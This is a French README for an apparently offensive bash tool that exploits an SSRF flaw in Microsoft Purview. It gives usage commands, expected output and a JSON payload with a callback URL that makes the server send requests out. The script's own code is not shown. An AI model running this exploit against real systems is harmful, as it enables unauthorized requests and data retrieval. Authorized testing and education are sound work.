
La vulnérabilité SSRF dans Microsoft Purview
Ce dépôt contient un script conçu pour effectuer une exploitation SSRF (Server-Side Request Forgery) à des fins de test et d'éducation. Utilisez cet outil de manière responsable et uniquement dans des environnements où vous avez une autorisation explicite.
bash (Unix shell)jq (JSON processor)curl (Command-line tool for HTTP requests)./script.sh --exploit <target_url> <purview_url>
| Option | Description |
|---|---|
-h, --help | Afficher le menu d'aide. |
--exploit tu pu | Effectuer l'exploitation SSRF avec l'URL cible et l'URL de référence (purview). |
./script.sh -h
Output:
Usage:
./script.sh --exploit <target_url> <purview_url>
Options:
-h, --help - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs
./script.sh --exploit http://example.com http://purview-url.com
Expected Output:
SSRF exploit successful! Data retrieved:
<response data>
SSRF exploit failed! HTTP code: <code>
purview_url, tentant d'exploiter une vulnérabilité SSRF../script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com
{
"callback": "http://callback-url.com"
}
Le code et le corps de la réponse HTTP sont enregistrés, et en fonction du code d'état, le succès ou l'échec de l'exploitation est déterminé.
Ce script est uniquement destiné à des fins de test. Une mauvaise utilisation de ce script peut entraîner de graves conséquences juridiques. Assurez-vous de respecter toutes les lois applicables et les normes éthiques.
N'hésitez pas à contribuer en créant des pull requests ou en signalant des problèmes.
Cet outil est destiné uniquement à des fins éducatives et à des tests de pénétration autorisés. L'auteur n'est pas responsable de toute mauvaise utilisation ou de tout dommage causé par cet outil.